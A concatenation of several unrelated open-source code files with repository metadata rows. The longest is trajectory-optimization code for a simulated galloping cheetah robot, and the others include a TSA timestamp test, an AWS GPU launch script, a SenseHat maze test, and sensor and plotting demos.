(body_B, ubl, lbl, hbl, 'BL'),
(body_B, ubr, lbr, hbr, 'BR')):
constrain_rel_angle(robot.m, name + '_hip_pitch',
-π/2, body[:, :, 'theta'], thigh[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, name + '_hip_aduct',
-π/8, body[:, :, 'phi'], thigh[:, :, 'phi'], π/8)
lo, up = (-π, 0) if name.startswith('B') else (0, π)
constrain_rel_angle(robot.m, name + '_knee',
lo, thigh[:, :, 'theta'], calf[:, :, 'theta'], up)
if hock is not None:
lo, up = (0, π)
constrain_rel_angle(robot.m, name + '_foot',
lo, calf[:, :, 'theta'], hock[:, :, 'theta'], up)
for th in hock[:, :, 'theta']:
th.setub(+π/3)
th.setlb(-π/3)
# common functions
def high_speed_stop(robot: System3D, initial_vel: float, minimize_distance: bool,
gallop_data: Optional[dict] = None, offset: int = 0):
import math
import random
from physical_education.utils import copy_state_init
from physical_education.init_tools import add_costs
if not has_tail(robot):
from physical_education.visual import warn
warn('Need to update high_speed_stop for no tail model!')
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
total_time = float((nfe-1)*robot.m.hm0.value)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if gallop_data is not None:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(
gallop_data, fed=fed, cpd=cpd, fes=(fed-1 + offset) % nfe, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['q'][1, ncp, q].fixed = True
link['dq'][1, ncp, q].fixed = True
else:
# init to y plane
body['q'][:, :, 'y'].value = 0
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = 0
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
for link in robot.links:
for ang in ('phi', 'psi'):
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, ang].setub(math.pi/4)
link['q'][fe, cp, ang].setlb(-math.pi/4)
# bound theta
for fe, cp in robot.indices(one_based=True):
for link in robot.links[4:]: # all leg segments - no tail or body
link['q'][fe, cp, 'theta'].setub(math.radians(60))
link['q'][fe, cp, 'theta'].setlb(math.radians(-60))
for link in robot.links[:2]: # two body segments
link['q'][fe, cp, 'theta'].setub(math.radians(45))
link['q'][fe, cp, 'theta'].setlb(math.radians(-45))
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.gauss(0, 15)))
body['q'][1, ncp, 'z'].fix(0.6)
# both sides mirrored
for src, dst in (('UFL', 'UFR'), ('LFL', 'LFR'), ('UBL', 'UBR'), ('LBL', 'LBR')):
copy_state_init(robot[src]['q'], robot[dst]['q'])
# init tail to flick?
for link in robot.links[2:4]:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.random()*60))
# stop weird local minimum where it bounces
for fe, cp in robot.indices(one_based=True):
if fe in range(10):
continue
# if fe > nfe/2: continue
height = body['q'][fe, cp, 'z']
height.setub(0.6) # approx. leg height
for foot in feet(robot):
foot['foot_height'][fe, cp].setub(0.01)
# start at speed
body['dq'][1, ncp, 'x'].fix(initial_vel)
# end at rest
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['dq'][nfe, ncp, q].fix(0)
# end in a fairly standard position
for link in robot.links[:2]: # two body segments
link['q'][nfe, ncp, 'theta'].setub(math.radians(10))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-10))
for link in robot.links[4:]: # leaving out tail - it might flail, which is good
link['q'][nfe, ncp, 'theta'].setub(math.radians(20))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-20))
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][nfe, ncp, ang].setub(math.radians(5))
link['q'][nfe, ncp, ang].setlb(math.radians(-5))
# position and velocity over time
for fe in robot.m.fe:
pos = total_time * (initial_vel/2) * (fe-1)/(nfe-1)
vel = initial_vel * (1 - (fe-1)/(nfe-1))
# print('pos', pos, 'vel', vel)
body['q'][fe, :, 'x'].value = pos
body['dq'][fe, :, 'x'].value = vel
# objective
distance_cost = body['q'][nfe, ncp, 'x'] if minimize_distance else 0
return add_costs(robot, include_transport_cost=False, include_torque_cost=False,
distance_cost=0.0001*distance_cost)
def periodic_gallop_test(robot: System3D,
avg_vel: float,
feet: Iterable['Foot3D'],
foot_order_vals: Iterable[Tuple[int, int]],
init_from_dict: Optional[dict] = None,
at_angle_d: Optional[float] = None
):
"""
foot_order_vals = ((1, 7), (6, 13), (31, 38), (25, 32)) # 14 m/s
"""
from math import sin, cos, radians
import random
from physical_education import utils
from physical_education.foot import prescribe_contact_order
from physical_education.init_tools import sin_around_touchdown, add_costs
from physical_education.constrain import straight_leg, periodic
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
m = utils.get_pyomo_model_or_error(robot)
total_time = utils.total_time(m)
utils.constrain_total_time(m, total_time=total_time)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if init_from_dict is None:
if at_angle_d is None or at_angle_d == 0:
# init to y plane
body['q'][:, :, 'y'].value = 0
# running in a straight line
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = (
radians(at_angle_d or 0) if ang == 'psi' else 0
)
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
for fe, cp in robot.indices(one_based=True):
var = robot.links[0]['q'][fe, cp, 'psi']
var.setub(radians((at_angle_d or 0) + 10))
var.setlb(radians((at_angle_d or 0) - 10))
# init theta
def rand(mu, sigma, offset=0):
return radians(random.gauss(mu, sigma)+offset)
for fe, cp in robot.indices(one_based=True):
# body
robot.links[0]['q'][fe, cp, 'theta'].value = rand(0, 15)
robot.links[1]['q'][fe, cp, 'theta'].value = rand(0, 15, +10)
# tail
if has_tail(robot):
robot.links[2]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
robot.links[3]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
offset = 2 if has_tail(robot) else 0
for link in robot.links[(2+offset):]: # legs
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = rand(0, 30)
# body height
body['q'][:, :, 'z'].value = 0.55
# the feet:
prescribe_contact_order(feet, foot_order_vals)
        # strip the '_foot' suffix explicitly (str.rstrip removes a set of characters, not a suffix)
        foot_names = [f.name[:-len('_foot')] if f.name.endswith('_foot') else f.name for f in feet]
        for (touchdown, liftoff), foot in zip(foot_order_vals, foot_names):
lower, upper = foot, 'U' + foot[1:]
straight_leg(robot[upper]['q'], robot[lower]['q'],
[touchdown], state='theta')
angles = sin_around_touchdown(int((touchdown + liftoff)/2),
len(robot.m.fe))
for fe, val in zip(robot.m.fe, angles): # type: ignore
robot[upper]['q'][fe, :, 'theta'].value = val
robot[lower]['q'][fe, :, 'theta'].value = val + \
radians(-15 if upper[1] == 'F' else 15)
# get timestep bounds ready
        # timesteps at their lower bound while in the air
robot.m.hm[:].value = robot.m.hm[1].lb
for start, stop in foot_order_vals:
for fe in range(start, stop+1):
                # but timesteps at their upper bound while a foot is on the ground
robot.m.hm[fe].value = robot.m.hm[fe].ub
else:
if init_from_dict['ncp'] == 1:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(init_from_dict, fed=fed, cpd=cpd, fes=fed-1, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
else:
robot.init_from_dict(init_from_dict)
if not (at_angle_d == 0 or at_angle_d is None):
raise ValueError(
f'TODO: rotate init! Got at_angle_d = {at_angle_d}')
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
phi = link['q'][fe, cp, 'phi']
phi.setub(radians(+15))
phi.setlb(radians(-15))
psi = link['q'][fe, cp, 'psi']
psi.setub(radians(+10 + (at_angle_d or 0)))
psi.setlb(radians(-10 + (at_angle_d or 0)))
# bound theta
# stop the back from going so high!
for link in robot.links[:2]: # body
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+45))
link['q'][fe, cp, 'theta'].setlb(radians(-45))
for link in robot.links[2:]: # everything else
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+90))
link['q'][fe, cp, 'theta'].setlb(radians(-90))
# never fallen over
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'z'].setlb(0.3)
body['q'][fe, cp, 'z'].setub(0.7)
if at_angle_d is None:
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
body['q'][fe, cp, 'x'].value = avg_vel * \
total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['dq'][fe, cp, 'x'].value = avg_vel
body['q'][nfe, ncp, 'x'].fix(total_time*avg_vel)
# periodic
periodic(robot, but_not=('x',))
else:
θᵣ = radians(at_angle_d)
# average velocity init (overwrite the init!)
for fe, cp in robot.indices(one_based=True, skipfirst=False):
scale = total_time * (fe-1 + (cp-1)/ncp)/(nfe-1)
body['q'][fe, cp, 'x'].value = avg_vel * scale * cos(θᵣ)
body['dq'][fe, cp, 'x'].value = avg_vel * cos(θᵣ)
body['q'][fe, cp, 'y'].value = avg_vel * scale * sin(θᵣ)
body['dq'][fe, cp, 'y'].value = avg_vel * sin(θᵣ)
#ol.visual.warn('Should probably also bound x, y!')
body['q'][nfe, ncp, 'x'].fix(total_time * avg_vel * cos(θᵣ))
body['q'][nfe, ncp, 'y'].fix(total_time * avg_vel * sin(θᵣ))
# periodic
periodic(robot, but_not=('x', 'y'))
return add_costs(robot, include_transport_cost=False, include_torque_cost=False)
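# A minimal usage sketch for the task above (hedged: it assumes a quadruped System3D
# named `robot` has already been built and robot.make_pyomo_model(...) has been called;
# the velocity and contact values simply echo the 14 m/s example from the docstring):
#
#     costs = periodic_gallop_test(robot, avg_vel=14.0, feet=feet(robot),
#                                  foot_order_vals=((1, 7), (6, 13), (31, 38), (25, 32)))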
# def set_quad_motor_limits(robot: System3D):
# """
# >>> robot.make_pyomo_model(nfe=10, collocation='implicit_euler', total_time=0.3)
# >>> increase_motor_limits(robot, torque_bound=5., no_load_speed=100.)
# >>> ol.motor.torques(robot)[0]['Tc'].pprint()
# """
# assert robot.m is not None, \
# 'robot.make_pyomo_model() must be called before calling this function'
# motors = {motor.name: motor for motor in ol.motor.torques(robot)}
# def set_lims(name, torque_bound, no_load_speed):
# motor = motors[name]
# for Tc in motor['Tc'][:, :]:
# Tc.setub(+torque_bound)
# Tc.setlb(-torque_bound)
# if hasattr(motor, 'torque_speed_limit'):
# tsp = motor.torque_speed_limit
# tsp.torque_bounds = (-torque_bound, torque_bound)
# tsp.no_load_speed = no_load_speed
# for name in ("base_B_base_F_torque", "base_B_UBL_torque", "base_B_UBR_torque"):
# set_lims(name, 2.5, 75.)
# for name in ("base_F_UFL_torque", "base_F_UFR_torque"):
# set_lims(name, 2., 150.)
# # for name in ("base_B_tail0_torque", "tail0_tail1_torque"):
# # set_lims(name, TORQUE, SPEED)
# for name in ("UFL_LFL_torque", "UFR_LFR_torque"):
# set_lims(name, 1., 75.)
# for name in ("UBL_LBL_torque", "UBR_LBR_torque"):
# set_lims(name, 0.75, 50.)
def theoretical_peak_power(*,
mass: float,
pct_mass_for_actuation: float = 0.5,
watts_per_kg: float = 600.,
disp: bool = True):
"""
>>> theoretical_peak_power(mass=sum(link.mass for link in robot.links))
"""
peak_power = mass*pct_mass_for_actuation*watts_per_kg
if disp:
print(f'Expected total power of a {mass:.2f} kg cheetah with '
f'{100*pct_mass_for_actuation:.2f}% of mass for actuation '
f'and {watts_per_kg:.2f} W/kg: mass*actuation*watts_per_kg = '
f'{int(peak_power)} W')
return peak_power
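# Arithmetic check (the 30 kg mass is illustrative, not a value from this file):
# a 30 kg model with the default 50% of mass for actuation at 600 W/kg gives
# 30 * 0.5 * 600 = 9000 W of theoretical peak power.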
def theoretical_peak_angle_velocity(stride_freq_Hz: float = 3.,
total_angle_deg: float = 180.,
disp: bool = True):
"""Cheetah leg moves from 0⁰ -> 90⁰ -> 0⁰ in about 1/3 of a second. Ie, follows the shape:
position(t) = 90/2 * sin(radians(t/0.3 * 360))
where t = 0..0.3
Differentiating with respect to time:
velocity(t) = 90/2 * cos(radians(t/0.3 * 360)) * 360/0.3
Giving a max velocity of
velocity(0) -> 90/2 * 360/0.3 =
Example code:
```python
from math import pi as π
total_angle_deg = 180.
stride_freq_Hz = 3.
t = np.linspace(0, 1/stride_freq_Hz)
pos = lambda t: total_angle_deg/2 * np.sin(t*stride_freq_Hz * 2*π)
plt.plot(t, 10*pos(t), label='position [deg] scaled by 10')
vel = lambda t: total_angle_deg/2 * np.cos(t*stride_freq_Hz * 2*π) * stride_freq_Hz * 2*π
plt.plot(t, vel(t), label='velocity [deg]')
max_ω_deg = total_angle_deg/2 * stride_freq_Hz * 2*π
plt.title(f'total angle change = {total_angle_deg} deg\nmax angular velocity = {max_ω_deg:.1f} deg/s = {np.radians(max_ω_deg):.1f} rad/s')
plt.legend(); plt.show()
```
"""
from math import pi as π, radians
peak = total_angle_deg/2 * stride_freq_Hz * 2*π
if disp:
print(f'Expected peak angular velocity of a leg moving though '
f'{total_angle_deg} degrees at {stride_freq_Hz} Hz:\n'
f'total_angle_deg/2 * stride_freq_Hz * 2*π '
f'= {peak:.2f} deg/s = {radians(peak):.2f} rad/s')
return peak
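# Worked example with the defaults: total_angle_deg=180 and stride_freq_Hz=3 give
# 180/2 * 3 * 2*π ≈ 1696 deg/s ≈ 29.6 rad/s of peak angular velocity.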
# def plot_power_values(robot: System3D, power_arr: List[np.ndarray]):
# import matplotlib.pyplot as plt
# peaks = np.sum(
# np.hstack(power_arr),
# axis=1
# )
# total_time = sum(
# robot.m.hm[fe].value for fe in robot.m.fe if fe != 1)*robot.m.hm0.value
# nfe = len(robot.m.fe)
# plt.plot(np.linspace(0, total_time, num=nfe), peaks)
# plt.title(
# f'Total power output of cheetah.\nPeak power: {int(np.max(peaks))} W')
# plt.ylabel('Total power [W]')
# plt.xlabel('time [s]')
# plt.show()
def relative_tail_velocity(cheetah: System3D, plot: bool) -> Dict[Tuple[str, str, str], ndarray]:
import matplotlib.pyplot as plt
from numpy import degrees, array # type: ignore
import numpy as np
base_B = cheetah['base_B']
tail0 = cheetah['tail0']
tail1 = cheetah['tail1']
diffs = {}
for a, b in ((base_B, tail0), (tail0, tail1)):
for ang in ('psi', 'theta'):
vela = array([a['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
velb = array([b['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
# diff = velb[:,0,idx] - vela[:,0,idx]
diff: np.ndarray = vela - velb
diffs[(a.name, b.name, ang)] = diff
if plot is True:
plt.plot(degrees(vela))
plt.plot(degrees(velb))
plt.plot(degrees(diff))
plt.legend((a.name, b.name, 'diff'))
                plt.title(f'{a.name} - {b.name}: {ang}, in degrees')
plt.show()
return diffs
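# Usage sketch (hedged): despite the name, the returned dict holds relative *angle*
# trajectories (it reads 'q', not 'dq'), keyed by (parent link, child link, angle), e.g.
#     diffs = relative_tail_velocity(cheetah, plot=False)
#     body_tail_pitch = diffs[('base_B', 'tail0', 'theta')]   # ndarray over fe/cp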
def gather_torque_data(cheetah: System3D, datanames: Iterable[str]) -> Dict[str, List[ndarray]]:
import dill
import pathlib
import numpy as np
from physical_education.motor import torques
data = None
for dataname in datanames:
cheetah.init_from_dict(dill.loads(
pathlib.Path(dataname).read_bytes()),
skip_if_fixed=True, skip_if_not_None=False, fix=False
)
datapoint: Dict[str, np.ndarray] = {
motor.name: motor.save_data_to_dict()['Tc']
for motor in torques(cheetah)
}
if data is None:
data = {k: [] for k in datapoint.keys()}
for k, v in datapoint.items():
data[k].append(v)
assert data is not None
return data
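# Usage sketch (hedged; the file names are placeholders): each entry of `datanames`
# should point to a dill-pickled solution dict saved elsewhere.
#     data = gather_torque_data(cheetah, ['run-01.pkl', 'run-02.pkl'])
#     # data maps motor name -> list of Tc arrays, one per loaded solution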
| 40.337563
| 146
| 0.541622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,435
| 0.358993
|
af1dd273f6773d5545946eaa77b49cdb5d3fee31
| 982
|
py
|
Python
|
data_visualization/data_visualization.py
|
or-tal-robotics/mcl_pi
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 3
|
2019-05-07T13:48:45.000Z
|
2020-09-02T15:10:35.000Z
|
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | null | null | null |
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 2
|
2021-01-28T23:34:21.000Z
|
2021-06-29T05:33:35.000Z
|
#!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def main():
data_komodo = pd.read_csv('komodo.csv',sep=',')
data_armadillo = pd.read_csv('armadillo.csv',sep=',')
data_visualization(data_komodo)
data_visualization(data_armadillo)
def data_visualization(data):
x = data['1']
ref = np.asarray(data['0'])
err = data['2']
x_temp = []
ref_temp = []
err_temp = []
for ii in range(len(ref)):
        # np.float was removed from NumPy; the error column is assumed to be whitespace-separated text
        x_temp.append(np.fromstring(x[ii][1:-1], dtype=float, count=3, sep=' '))
        ref_temp.append(np.fromstring(ref[ii][1:-1], dtype=float, count=2, sep=' '))
        err_temp.append(np.fromstring(err[ii], dtype=float, sep=' '))
x = np.array(x_temp)
ref = np.array(ref_temp)
err = np.array(err_temp)
plt.plot(x[:,0],x[:,1])
plt.plot(ref[:,0],ref[:,1])
plt.show()
plt.plot(err)
plt.show()
if __name__ == "__main__":
main()
| 25.179487
| 88
| 0.588595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.082485
|
af1ff2337c60e542c9bcc64ce74be8ee36948153
| 1,822
|
py
|
Python
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 6
|
2021-02-04T13:15:13.000Z
|
2022-02-04T17:21:40.000Z
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 5
|
2020-10-26T14:43:34.000Z
|
2021-12-27T14:40:10.000Z
|
pyasice/tests/test_tsa.py
|
thorgate/pyasice
|
4423b7251392c7bf6bc5d14800b9b396b8eb2222
|
[
"0BSD"
] | 1
|
2021-07-21T15:36:31.000Z
|
2021-07-21T15:36:31.000Z
|
import hashlib
from unittest.mock import Mock, patch
from asn1crypto.cms import ContentInfo
from asn1crypto.tsp import PKIStatus, PKIStatusInfo, TimeStampResp
from pyasice.tsa import requests, TSA
class MockResponse(Mock):
status_code = 200
headers = {"Content-Type": TSA.RESPONSE_CONTENT_TYPE}
def test_tsa_build_message_imprint():
assert TSA.build_message_imprint(b"test") == {
"hash_algorithm": {"algorithm": "sha256"},
"hashed_message": hashlib.sha256(b"test").digest(),
}
def test_tsa_get_timestamp(demo_ts_response):
tsa = TSA("http://dummy.url")
with patch.object(tsa, "build_ts_request") as mock_build_ts_request:
mock_build_ts_request.return_value = Mock()
mock_build_ts_request.return_value.dump.return_value = "Mock TSA Request"
with patch.object(requests, "post") as mock_post:
mock_post.return_value = response = MockResponse()
response.content = TimeStampResp(
{
"status": PKIStatusInfo(
{
"status": PKIStatus(0),
}
),
"time_stamp_token": ContentInfo.load(demo_ts_response),
}
).dump()
ts_response = tsa.get_timestamp(b"test")
assert isinstance(ts_response, ContentInfo)
mock_build_ts_request.assert_called_once_with(b"test")
mock_post.assert_called_once_with(
"http://dummy.url",
data="Mock TSA Request",
headers={
"Content-Type": TSA.REQUEST_CONTENT_TYPE,
"Connection": "close",
},
)
def test_tsa_existing_response(demo_xml_signature, demo_ts_response):
TSA.verify(demo_ts_response, demo_xml_signature.get_timestamped_message())
| 31.964912
| 81
| 0.63337
| 105
| 0.057629
| 0
| 0
| 0
| 0
| 0
| 0
| 256
| 0.140505
|
af2025817a250b509240a41f88f09a6209dab649
| 317
|
py
|
Python
|
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
0-python-tutorial/16-forLoops09.py
|
luis2ra/py3-00-w3schools
|
6bb851837f8ef9520491d13fa2c909047c9b18cf
|
[
"MIT"
] | null | null | null |
# Demo Python For Loops - Else in For Loop
'''
Else in For Loop
The else keyword in a for loop specifies a block of code to be executed when the loop is finished:
'''
# Print all numbers from 0 to 5, and print a message when the loop has ended:
for x in range(6):
print(x)
else:
print("Finally finished!")
| 24.384615
| 98
| 0.700315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 263
| 0.829653
|
af223891e643b0660e741c07d3a8f87905708723
| 1,341
|
py
|
Python
|
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/mazehat/test_view_to_sensehat.py
|
AndrewWasHere/aMAZEing_SenseHat
|
03f0c15f99b6d6c56c2baad4e558799e91fc194a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright 2017, Andrew Lin
All rights reserved.
This software is licensed under the BSD 3-Clause License.
See LICENSE.txt at the root of the project or
https://opensource.org/licenses/BSD-3-Clause
"""
from maze.maze import Maze, Coordinates
from maze.mazehat import MazeHat
def test_view_to_sensehat():
mh = MazeHat()
maze = [
list('#######'),
list(' ##### '),
list('# # # #'),
list(' SHFH '),
list('# # # #'),
list(' ##### '),
list('#######'),
]
view = Maze(maze, 7).view(Coordinates(6, 6))
gold_view = [
mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty,
mh.empty, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty, mh.empty,
mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty,
mh.empty, mh.empty, mh.start, mh.avatar, mh.finish, mh.hazard, mh.empty, mh.empty,
mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty, mh.wall, mh.empty,
mh.empty, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty, mh.empty,
mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.wall, mh.empty,
mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty, mh.empty,
]
mview = mh.view_to_sensehat(view)
assert mview == gold_view
| 34.384615
| 90
| 0.59135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 268
| 0.199851
|
af2278683fee1298b0caf86e836a20709cd9fe8a
| 1,619
|
py
|
Python
|
deploy/gpu/aws/launch_aws.py
|
ysglh/DeepVideoAnalytics
|
ce807cc1595c813250bb4bc7dfc6fb76cd644335
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2019-03-05T00:46:56.000Z
|
2021-11-26T10:20:40.000Z
|
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 4
|
2021-09-22T07:47:27.000Z
|
2022-01-23T14:16:08.000Z
|
#!/usr/bin/env python
import logging, boto3, subprocess
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='../../logs/cloud.log',
filemode='a')
from config import AMI,KeyName,SecurityGroupName,IAM_ROLE,env_user,key_filename
if __name__ == '__main__':
ec2 = boto3.client('ec2')
ec2r = boto3.resource('ec2')
instances = ec2r.create_instances(DryRun=False, ImageId=AMI, KeyName=KeyName, MinCount=1, MaxCount=1,
SecurityGroups=[SecurityGroupName, ], InstanceType="p2.xlarge",
Monitoring={'Enabled': True, },BlockDeviceMappings=[{"DeviceName": "/dev/sda1",
"Ebs" : { "VolumeSize" : 200 }}],
IamInstanceProfile=IAM_ROLE)
for instance in instances:
instance.wait_until_running()
instance.reload()
print(instance.id, instance.instance_type)
logging.info("instance allocated")
with open('host','w') as h:
h.write(instance.public_ip_address)
fh = open("connect.sh", 'w')
fh.write(
"#!/bin/bash\n" + 'autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 8600:localhost:8000 -L 8688:localhost:8888 -i ' + key_filename + " " + env_user + "@" +
instance.public_ip_address + "\n")
fh.close()
subprocess.call(['fab','deploy'])
| 52.225806
| 189
| 0.546016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 393
| 0.242742
|
af235ba38a9be96557da2c0dd0d6fdf8cdff77b7
| 604
|
py
|
Python
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | 2
|
2021-06-18T09:34:05.000Z
|
2021-06-18T09:52:18.000Z
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
# Connect bmp388 and esp32 via I2C.
#
# Warning:
# This demo only supports python3.
# Run this demo : python3 I2CreadTemperature.py
#
# connect:
# raspberry bmp388
# 3.3v(1) VCC
# GND(6) GND
# SCL(5) SCL
# SDA(3) SDA
# BMP388_I2C_ADDR = 0x76: pin SDO is low
# BMP388_I2C_ADDR = 0x77: pin SDO is high
import bmp388
import time
# Create a bmp388 object to communicate with I2C.
bmp388 = bmp388.DFRobot_BMP388_I2C(0x77)
# Read temperature and print it
while 1:
temp = bmp388.readTemperature()
print("Temperature : %s C" %temp)
time.sleep(0.5)
| 22.37037
| 49
| 0.652318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.730132
|
af24b85975ed6fa9fb7dc53d770b3f47d5edbcbc
| 747
|
py
|
Python
|
shadowsocksr_cli/setting_utils.py
|
fanlix/ssr-command-client
|
3d6884a2c0f360d47825a500942a8d4209705972
|
[
"MIT"
] | 592
|
2020-02-27T16:08:16.000Z
|
2022-03-31T12:14:55.000Z
|
shadowsocksr_cli/setting_utils.py
|
huzhuangwu/ssr-command-client
|
5a47a4fe1e52e28f8ab7e219d7708992f8411c9c
|
[
"MIT"
] | 57
|
2020-03-04T14:36:03.000Z
|
2022-03-27T09:32:30.000Z
|
shadowsocksr_cli/setting_utils.py
|
huzhuangwu/ssr-command-client
|
5a47a4fe1e52e28f8ab7e219d7708992f8411c9c
|
[
"MIT"
] | 179
|
2020-03-05T10:52:16.000Z
|
2022-03-30T13:06:12.000Z
|
"""
@author: tyrantlucifer
@contact: tyrantlucifer@gmail.com
@blog: https://tyrantlucifer.com
@file: setting_utils.py
@time: 2021/2/18 22:42
@desc:
"""
from shadowsocksr_cli.logger import *
class Setting(object):
"""配置项工具类
提供从本地配置文件中读取对应参数的功能
属性:
config: 配置文件对象
"""
config = configparser.ConfigParser()
config.read(init_config.config_file)
def __init__(self):
pass
@staticmethod
def get_value(key):
return Setting.config.get('default', key)
@staticmethod
def set_value(key, value):
Setting.config.set('default', key, str(value))
with open(init_config.config_file, 'w+') as file:
Setting.config.write(file)
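# Usage sketch (hedged; 'log_level' is a hypothetical key, not one defined in this file):
# Setting.set_value('log_level', 'DEBUG')
# print(Setting.get_value('log_level'))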
| 20.189189
| 58
| 0.621151
| 604
| 0.742927
| 0
| 0
| 289
| 0.355474
| 0
| 0
| 326
| 0.400984
|
af25fd66be9e5c7407f8446bd876b6900df66a06
| 2,037
|
py
|
Python
|
conanfile_installer.py
|
madebr/conan-vulkan_lunarg
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 4
|
2019-06-08T23:54:02.000Z
|
2020-11-10T20:57:54.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 1
|
2019-08-16T13:27:59.000Z
|
2019-08-16T13:27:59.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
